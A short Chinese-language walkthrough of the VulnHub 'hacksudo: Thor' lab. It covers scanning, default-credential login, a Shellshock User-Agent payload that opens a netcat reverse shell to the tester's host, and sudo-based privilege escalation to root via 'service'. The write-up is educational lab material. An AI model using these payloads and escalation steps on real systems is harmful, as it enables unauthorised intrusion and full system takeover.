HACKSUDO: THOR靶场实战

https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip

nmap -sP 192.168.106.0/24  #对自己的靶机网段进行存活探测，获取靶机地址nmap -T4 -A -p- 192.168.106.133  #对目标进行全端口扫描

通过扫描发现目标开放了21、22、80端口对目标进行目录爆破查看news.php页面发现cgi-bin，说明使用了CGI技术发现存在README.md文件通过阅读README.md得知该系统源码托管在Github上https://github.com/zakee94/online-banking-system/tree/master/net-banking并且获取到了系统默认的用户密码admin password123

通过admin用户进行登录http://192.168.106.133/home.php #无法登录成功http://192.168.106.133/admin_login.php # 成功登录通过点击页面查看发现存在4个用户名，点击获取到他们的密码zakee94 nafees123'salman salman123'tushar tushar123'jon snow123'

爆破http://192.168.106.133/cgi-bin/目录下的文件，查看是否存在cgi脚本存在以下文件：/cgi-bin/backup.cgi/cgi-bin/shell.sh/ /cgi-bin/shell.sh对目标进行扫描，发现目标存在CVE-2014-6271、CVE-2021-42071、rce-user-agent-shell-shock漏洞使用rce-user-agent-shell-shock漏洞反弹shellUser-Agent: () { :; }; echo; echo; /bin/sh -c 'nc -e /bin/bash 192.168.106.128 4444'使用python升级shellpython3 -c 'import pty;pty.spawn("/bin/bash")'

通过sudo -l 发现拥有thor用户的hammer.sh文件权限发现该脚本发现可以以thor用户权限执行系统命令使用bash命令切换到thor用户再次通过sudo -l查看发现thor用户拥有root用户的cat权限和service权限

使用service程序成功提权为root用户sudo service ../../bin/sh